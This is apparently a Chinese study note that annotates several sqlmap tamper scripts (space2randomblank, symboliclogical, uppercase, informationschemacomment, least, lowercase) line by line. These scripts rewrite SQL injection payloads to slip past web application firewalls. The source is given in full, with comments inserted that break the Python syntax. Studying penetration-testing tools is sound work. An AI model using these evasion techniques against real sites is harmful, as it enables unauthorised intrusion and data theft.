space2randomblank
作用:空格替换为备选字符集中的随机字符
例子:
('select id from users')
( select %0Did%0DFRM%0A users')
详细注释:
#!/usr/bin/env python//此处用法为:程序到env设置里查找python的安装路径,再调用对应路径下的解释器程序完成操作
""" //python 的多行注释符
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import random
from lib.core.compat import xrange //导入sqlmap中的lib/core/compat中的xrange函数
from lib.core.enums import PRIORITY//导入sqlmap中lib/core/enums 中的PRIORITY函数
__priority__ = PRIORITY.LOW//定义优先级,此处级别为一般
def dependencies(): //定义dependencies() ,此处是为了和整体脚本的结构保持一致
pass //不做任何事情,一般用做站位语句,为了保证程序的完整性
def tamper(payload, **kwargs)://定义tamper 脚本,payload, **kwargs为定义的参数
""" //多行注释符
Replaces space character (' ') with a random blank character from a valid set of alternate characters //此处为tamper说明,以便使用该脚本
Tested against: //用于多种数据库,并且作用与弱防护效果的防火墙
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'
"""
# ASCII table:
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
blanks = ("%09", "%0A", "%0C", "%0D")
retVal = payload
if payload: //判断payload
retVal = "" //将retVal 赋值为空语句
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload))://xrange为一个生成器
if not firstspace:
if payload[i].isspace()://检测字符串是否只由空格组成
firstspace = True//将true 赋给firstspace
retVal += random.choice(blanks)//返回一个列表,元组或字符串的随机项
continue//跳出本次循环
elif payload[i] == '\''://判断字符是否为'\'
quote = not quote
elif payload[i] == '"'://判断字符是否为"
doublequote = not doublequote
elif payload[i] == ' ' and not doublequote and not quote:
retVal += random.choice(blanks)//返回一个列表,元组或字符串的随机项
continue//跳出本次循环
retVal += payload[i]
return retVal//返回随机字符
symboliclogical
作用:AND和OR替换为&&和||
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"
"""
retVal = payload//将payload赋值给retVal
if payload:
retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))//判断是否为AND和OR,将其替换为&&和||
return retVal
uppercase
作用:全部替换为大写值
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces each keyword character with upper case value (e.g. select -> SELECT)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> tamper('insert')
'INSERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal)://对retVal payload 进行大写查找
word = match.group()//将查找内容赋值给word
if word.upper() in kb.keywords://如果在攻击载荷中有小写字母
retVal = retVal.replace(word, word.upper())//将小写字母转化成大写字母
return retVal//返回大写字母
informationschemacomment
作用:标识符后添加注释
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs):
"""
Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
"""
retVal = payload
if payload://判断payload
retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)//赋值遇见information_schema
return retVal//返回
least
作用:替换大于号为least
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces greater than operator ('>') with 'LEAST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the greater than character
* The LEAST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databases
>>> tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'
"""
retVal = payload
if payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)//re.search扫描整个字符串并返回第一个成功的匹配 \w 等价于'[A-Za-z0-9_]'
if match:
_ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))//返回match 的一个或多个子组
retVal = retVal.replace(match.group(0), _)//将旧字符串替换成新的字符串
return retVal//返回retVal
```php
lowercase
作用:将大写字母转化成小写字母
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces each keyword character with lower case value (e.g. SELECT -> select)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
>>> tamper('INSERT')
'insert'
"""
retVal = payload //将payload赋值给retVal,以便中间转换
if payload://进行判断payload
for match in re.finditer(r"\b[A-Za-z_]+\b", retVal)://对retVal payload 进行小写查找
word = match.group()//将查找到的字母赋值给word
if word.upper() in kb.keywords://如果再攻击载荷中有大写字母
retVal = retVal.replace(word, word.lower())//将大写字母转化为小写字母
return retVal//返回小写字母